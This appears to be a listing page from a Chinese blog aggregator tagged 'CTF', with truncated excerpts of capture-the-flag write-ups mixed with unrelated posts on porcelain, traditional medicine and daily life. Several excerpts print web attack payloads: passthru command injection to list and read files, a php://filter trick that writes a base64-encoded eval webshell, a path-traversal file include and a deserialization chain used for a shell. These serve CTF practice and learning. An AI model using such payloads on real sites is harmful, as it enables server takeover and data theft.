CTF夺旗

[go] 抽象工厂模式

抽象工厂(AbstractFactory)接口声
ldxxxxll·2024-01-18 07:20

艳惊四座!乾隆镂空瓶1.495亿元——大陆拍场首件过亿成交瓷器

此件拍品制作工艺极其复杂,为清代最著名的御窑督陶唐英最为巧天空的瓷器之一,是为乾隆御窑重器。乾隆时期社会稳定,国库充盈,宫廷制作器物愈加装饰繁缛,以体现盛世承平之象。就瓷器而言,前期烧制青花追
米其林古董·2024-01-18 05:58

2022-10-16

1921年的嘉兴南湖上,几位有志青年们点燃了革命之火,竖起了革命之,铺开了炎黄子孙们前进的道路。“靡不有初,鲜克有终,不忘初心,方得始终”。
Ivy_999·2024-01-18 03:09

四时调神论

天地俱生,万物以荣,夜卧早起,广步于庭,被发缓形,以使志生;生而勿杀,予而勿,赏而勿罚,此春气之应,养生之道也。逆之则伤肝,夏为寒变,奉长者少。解:春三月,立春雨水,春一月寅1。惊蛰春
add488ad17ab·2024-01-18 03:20

centos7 安装mysql 出现 libnuma.so.1 问题解决

使用tar包安装mysql时出现:errorwhileloadingsharedlibraries:libaio.so.1:cannotopensharedobjectfile:Nosuchfileordirectoryerrorwhileloadingsharedlibraries
GitHub质检员·2024-01-18 03:35

XCTF-Misc1 pcap1 misc2-1

pcap1附件是一个xxxxx.pcap流量包分析1.流量包筛选统计协议分级,发现主要是TCP协议查看TCP协议的流量包,筛选关键词tcpcontainsflag跟踪TCP流,发现是python代码,将其导出2.导出的代码分析导出的代码,是对字符串进行自定义的base64、rot13、凯撒加密importstringimportrandomfrombase64importb64encode,b64
777sea·2024-01-18 02:56

XCTF-Misc1 Let_god_knows

Let_god_knows题目描述附件是一张图片Let_god_knows.bmp分析binwalk查看了没有隐藏文件,stegsolve查看通道,第一遍完全没有找到什么不同,LSB隐写我看了一下,实在是没找到突破口,只好去搜一下。然后就蛮无语的,在red通道0里面居然藏了一个二维码这个二维码太小了,哪怕截图,都不容易扫描,而且周边的黑白也会影响二维码的扫描。没办法,找到了题目的解题脚本:参考链接
777sea·2024-01-18 02:56

田径运动员苏炳添担任中国奥运会闭幕式旗手

随着奥运会代表团的结束,广东田径选手有幸成为了奥运会闭幕式的护旗手,
舞子泳·2024-01-18 02:24

晨读《黄帝内经》1

四气调神大论篇第二图片发自App春三月,此谓发陈,天地俱生,万物以荣,夜卧早起,广步于庭,被发缓形,以使志生,生而勿杀,予而勿,赏而勿罚,此春气之应,养生之道也。逆之则伤肝,夏为寒变,奉长者少。
静复居士·2024-01-18 02:27

从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令

之前发现pwn虚拟机从零开始配置pwn环境:CTFPWN做题环境-CSDN博客无libc,magic等指令,后来查资料发现是没有安装Pwngdb,按如下处理解决该问题1.在pwn虚机上安装Pwngdbcd
网络安全我来了·2024-01-18 02:12

SWPUCTF 2022 新生赛-WEB部分wp

目录ez_ez_phpez_ez_php(revenge)奇妙的MD51z_unserializenumgamewhere_am_iez_ez_unserializejs_signxffwebdog1__startez_sqlfunny_phpfunny_webez_1zpopEz_uploadfile_masterPower!ez_ez_php源代码:即'or'66�]��!r,��b用途:se
orzw·2024-01-18 02:36

[SWPUCTF 2022 新生赛]numgame&奇妙的MD5

[SWPUCTF2022新生赛]numgame打开是一个永远到不了20的计算界面接着f12查看网页源代码发现打不开使用开发者工具看看能不能打开发现里边有一个前往网页的标签打开发现是一个js的代码这个地方有一串
ksks76·2024-01-18 02:06

[SWPUCTF 2022 新生赛]1z_unserialize和[SWPUCTF 2022 新生赛]ez_1zpo

[SWPUCTF2022新生赛]1z_unserialize这个题目是一题很标准的反序列化,$a=$this->lt;$a($this->lly);这是这一题的注入点只要传参把$a变成system();
ksks76·2024-01-18 02:06

[SWPUCTF 2022 新生赛]奇妙的MD5

[SWPUCTF2022新生赛]奇妙的MD5wp题目页面:提示:可曾听过ctf中一个奇妙的字符串。
妙尽璇机·2024-01-18 02:34

《西游记》中关于太上老君的有趣猜想

《西游记》第七回中,如来佛祖训斥孙悟空大闹天宫,“佛祖听言,呵呵冷笑道:“你那厮乃是个猴子成精,焉敢欺心,要玉皇上帝尊位?他自幼修持,苦历过一千七百五十劫。
闲读与苦读·2024-01-18 01:23

使用Python实现根据指定的出生日期自动生成测试身份证号码的方法

2.地址码表示编码对象常住户口所在县(县级市、、区)的行政区划代码,按GB/T2260的规定执行。
晓风大神·2024-01-18 01:32

polar CTF 简单rce

一、题目nonono二、解题1、知识passthru()只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。(替换system)payloadget?sys=passthru('ls%09/');postyyds=666payloadget?sys=passthru('sort%09/flag');postyyds=666
samRsa·2024-01-17 23:46

polar CTF CB链

一、题目二、解答(正常套路,这道题解不出,快速向下面看)1、通过jar包,可以看到/user路由下有反序列化操作看到存在commons-beanutils依赖且版本为1.9.2,可利用CB链Getshell。使用ysoserial项目中的CommonsBeanutils1链写一个POC,注意确保ysoserial项目中的pom.xml中的commons-beanutils与题目一致;ysoseri
samRsa·2024-01-17 23:46

polar CTF 写shell

一、题目二、解题payload?filename=php://filter/convert.base64-decode/resource=shell.php#content=aPD89QGV2YWwoJF9QT1NUWzFdKTs/Pg==然后访问/shell.php发现木马被读入,用蚁剑连接
samRsa·2024-01-17 23:42

[SWPUCTF 2022 新生赛]1z_unserialize

[SWPUCTF2022新生赛]1z_unserializewp题目代码:lt;$a($this->lly);}}unserialize($_POST['nss']);highlight_file(__
妙尽璇机·2024-01-17 23:06

[HNCTF 2022 Week1]What is Web

flag在源码里<!是HTML文档的注释格式,在源码里按Ctrl+F搜索<!能帮你更快地找到提示。将这个字符串base64解码得到flag:
妙尽璇机·2024-01-17 23:06

[NSSCTF Round#16 Basic]了解过PHP特性吗

了解过PHP特性吗wp第一页题目代码:114514&&strlen($_114)9999999){$checker_3=TRUE;}}$arr4y=$_POST['arr4y'];if(is_array($arr4y)){for($i=0;$i114514&&strlen($_114)9999999){$checker_3=TRUE;}}114用科学记数法传入即可,514可以用数字+字母,数字+%
妙尽璇机·2024-01-17 23:06

[NSSCTF Round #8]——web专项赛wp

MyDoor上来什么也没有,用php伪协议读取index.php中的内容,构造payload:http://node2.anna.nssctf.cn:28803/index.php?
Leafzzz__·2024-01-17 23:05

[NSSCTF Round#16 Basic]RCE但是没有完全RCE

RCE但是没有完全RCEwp题目代码:第一关
妙尽璇机·2024-01-17 23:35

Android马甲包开发

build.gradle中一些相关配置2.AndroidManifest.xml中的一些相关配置(${}的使用)3.不同马甲包存放路径4.签名文件路径配置1.build.gradle中一些相关配置productFlavor
好运常伴amin·2024-01-17 23:35

天才召唤师

云家财产者,五倍之力还之!谋云家性命者,十倍之力
资深少女小说爱好者·2024-01-17 22:02

React全局状态管理

index.jsimportReactfrom'react'importReactDOMfrom'react-dom'impo
卡卡舅舅·2024-01-17 21:33

生活细语(十)

婚姻貌似是两个人的结合,实质上是两个人带着两个家庭、举着两个不同背景文化之的集体旅行。欺骗是为达到某一阶段性目标的伪装,而伪装则是为达到终极目标的欺骗!
木旦_d300·2024-01-17 21:20

[buu - web]HCTF2018 WarmUp

HCTF2018WarmUp"source.php","hint"=>"hint.php"];if(!isset($page)||!
菜菜zhao·2024-01-17 20:00

[HCTF 2018] WarmUp

[HCTF2018]WarmUp开局一张图,先看看页面源码信息给出了一个source.php应该是后端的源码,这题代码审计了"source.php","hint"=>"hint.php"];#这是定义了一个白名单
iKnsec·2024-01-17 20:28

[HCTF 2018]WarmUp1解题思路

1.看题如下,得到一张滑稽表情2.老方法F12先看网页源码,得到注释提示3.访问hint.php,得到一串提示信息flagnothere,andflaginffffllllaaaagggg现在构造获取flag的语句hint.php?../…/…/…/…/ffffllllaaaagggg我们可以想象他传入checkFile函数要经历第一次白名单验证一次?过滤后他就是hint.php再进行一次白名单验
旺仔Sec·2024-01-17 20:28

BUUCTF [HCTF 2018]WarmUp

打开环境是一个滑稽查看源代码,提示source.php打开source.php是php代码"source.php","hint"=>"hint.php"];if(!isset($page)||!is_string($page)){echo"youcan'tseeit";returnfalse;}#检查变量page里是否有source.php或者hint.phpif(in_array($page,$
白塔河冲浪手·2024-01-17 19:57

【BUUCTF】 HCTF2018 WarmUp

这是一道有关php代码审计的入门题目,进入所给链接后看到的是一张滑稽的表情包按照常规思路f12,看一看有什么,结果发现了一个名为source.php的注释访问这个php页面,发现有一段代码代码先定义了一个checkFile函数,然后主函数在下大致意思是,只有链接中包含了file文件请求且通过了checkFile函数的验证,那么将把链接包含的file文件include到页面中,否则输出一张图片(推测
90wunch·2024-01-17 19:57

[HCTF 2018]WarmUp1

建议复制到自己vscode里观看本来今天想在宿舍躺捏,后来想想还是来gxg把这篇writeup补完吧--------------------------------------------------这是buuctf
我小皮超勇的·2024-01-17 19:27

一、[HCTF 2018]WarmUp

1.第一步看源码2.看source.php观察源码逻辑,首先可以发现白名单是只有source.php和hint.php,通过访问hint.php我们可以知道flag在ffffllllaaaagggg文件中但很明显我们无法直接访问,所以当然是继续分析逻辑3.审计source.php文件if(!empty(REQUEST[′file′])//_REQUEST['file'])//REQUEST[′fi
囍语儿·2024-01-17 19:57

[HCTF 2018]WarmUp

1.访问页面,搞笑的喔。2.查看源码,有注释,那么就访问看看吧。3.访问路径http://54f45a07-0d65-4fc4-8368-9aae675b5e23.node5.buuoj.cn:81/source.php,发现源码。"source.php","hint"=>"hint.php"];if(!isset($page)||!is_string($page)){/*为了返回true两个条件
有搞头-CC·2024-01-17 19:26

HCTF2018 Warm up writeup

HCTF2018Warmupwriteup拿到题目之后发现这是一张滑稽的脸。查看源代码之后发现有注释的source.php。遂访问。得到源代码。接下来就是复杂的代码审计工作。
JSMa4ter·2024-01-17 19:26

HCTF 2018 WarmUp Wp

首先打开页面是一个滑稽的表情,直接F12看到source.php的提示ok看source.php直接分析代码第一眼就看到有hint.php文件,直接打开看flagnothere,andflaginffffllllaaaagggg在主体代码中最重要的是通过GET传入file参数,判断emmm::类中checkFile是否为true那只看emmm这个类classemmm{publicstaticfun
Luminous_song·2024-01-17 19:26

2022-07-30

此次重要讲话明确宣示党在新征程上举什么、走什么路、以什么样的精神状态、朝着什么样的目标继续前进,对团结和激励全国各族人民为夺取中国特色社会主义新胜利而
梁亦冕·2024-01-17 19:56

秋月夜

四季往复,任其他三季再抢再争,也不能将秋夜的魅力了去。春少眠,夏太燥,冬天的风又凛,独数秋夜的天空最为清朗通透、苍凉壮阔,似乎蕴藏着磅礴深邃的静谧之力,能让四海八荒之生灵归于宁静。
ab76304d75b7·2024-01-17 19:52

战国七雄

第九节围魏救赵(二)齐军举行了祭仪式,正式起兵。田忌带兵开拔,打算直接兵进邯郸与赵军一同作战。但是他把这个想法和孙膑一说,孙膑则提出了不同意见。
狼2639·2024-01-17 18:56

BUUCTF-[护网杯 2018]easy_tornado 记录

[护网杯2018]easy_tornado首先打开界面,看到三个链接,分别点一下根据三个链接提示,flag在/fllllllllllllag文件中,render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。根据url需要个filehash,这个应该就是生成的filehash的方式,filename已经有了,就剩下cookie_secret.测试后发现还有
低调求发展·2024-01-17 17:36

不争不

从中午睡到下午,感觉脑袋好像被灌了铅一样沉重,一想到明天又是难熬的白班就满腹的牢骚,不只一次的想过结束这种伤身体的熬夜又乏味的工作,却又有各种各样的顾虑而后不了了之。虽然不喜欢熬夜,但是只要身边有书有文字还是挺享受黑夜到破晓的过程的,昨天凌晨两点把日记整理完毕发到后满足的长舒一口气,写了那么久的日记才刚刚算是学会了写日记,三点出去查看设备的运行时抬头望着安静的夜空,居然油然而生出一种幸福感,而此时
江梦南·2024-01-17 17:58

2021.12.13 晴 星期一 孙贞正妈妈亲子日记第

但是被爸爸强行拉起来,当时我心里真的是特别的,气氛我多想在床上再躺一会,之后就就去了学校,学校里在路上,因为我早上没有吃早饭,去买了一个包子,完了,包子之后,到了学校里,上了早读,但是早读是升旗,升完了之后
秋枫_d581·2024-01-17 15:35

今年的冬天格外冷:冻得哆嗦

昔日,马路上熙熙攘攘的健身队伍不见了,公园里喧闹的广场舞也偃旗息鼓了,只留下周边的五色疯狂飘舞着。
迦百农123·2024-01-17 15:30

CTF CRYPTO 密码学-1

题目名称:enc题目描述:压缩包中含两个文件:一个秘钥d.dec,一个密文flag.enc解题过程:Step1:这题是一个解密他题目,尝试openssl去ras解密工具简介在KaliLinux系统中,openssl是一个强大的命令行工具,用于处理SSL/TLS协议。opensslpkeyutl是openssl工具集中的一个命令,用于处理私钥文件。参数解释opensslpkeyutl:这是执行私钥操
Brucye·2024-01-17 13:42

CTF CRYPTO 密码学-2

ZZZZXXXZZZZXZZZXZZXZZXXXXXZXXXXZZXZXZZZZXZXXZXZZ分析此字段是由Z和X组成的字符,联想到莫斯密码是由.和-组成的所以接下来可以尝试莫斯密码解题解题过程:Step1:Z替换为.X替换为-Step2:使用CTF
Brucye·2024-01-17 13:42

CTF CRYPTO 密码学-4

题目名称:奇怪的先生题目描述:描述:oss先生将三个培根的中间一只移到了左边,然后咬了一小口最后一根,说真好吃,真是个奇怪的先生!密文:VlM5WnlXc0ZibEhmMmE1ZHYxMDlhVkdmMlk5WmtRPT0=分析应该是根据题目提示解出压缩包的密码,查看flag。解题过程:Step1:先进行Base64解密第一次:第二次:分析发现第二次解密失败,查看题目描述。三只培根,根据密码特征联
Brucye·2024-01-17 13:42

CTF CRYPTO 密码学-3

题目名称:反编译题目描述:分析题目给出一个pyc后缀的文件,需要使用uncompyle6模块去还原成py文件uncompyle6简介uncompyle6是一个Python反编译器,它能够将Python字节码(.pyc文件)转换回源代码(.py文件)。解题过程:Step1:下载uncompyle6包pipinstalluncompyle6注意版本问题uncompyle6默认只支持3.8及以下版本如何
Brucye·2024-01-17 13:09

星期一升

谈到升旗,又是形式主义满满的,当然我说的形式主义是哪些所谓的学生会所干的事情升旗需要每个人带团徽,校卡,院服等等,而我想说的是学生会哪些人把我们每个人都检查一遍,不能缺少任何东西,如果缺了,那就扣分!扣分!扣分!对于刻意的检查我们而用了20分钟左右,真的很讽刺升旗是好事,而学生会哪些人的做法是我不能理解的还有除了此事以为,还有很多形式主义于我而言是不能接受的,各种奇葩都有。
谟o·2024-01-17 12:19
上一页 31 32 33 34 35 36 37 38 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他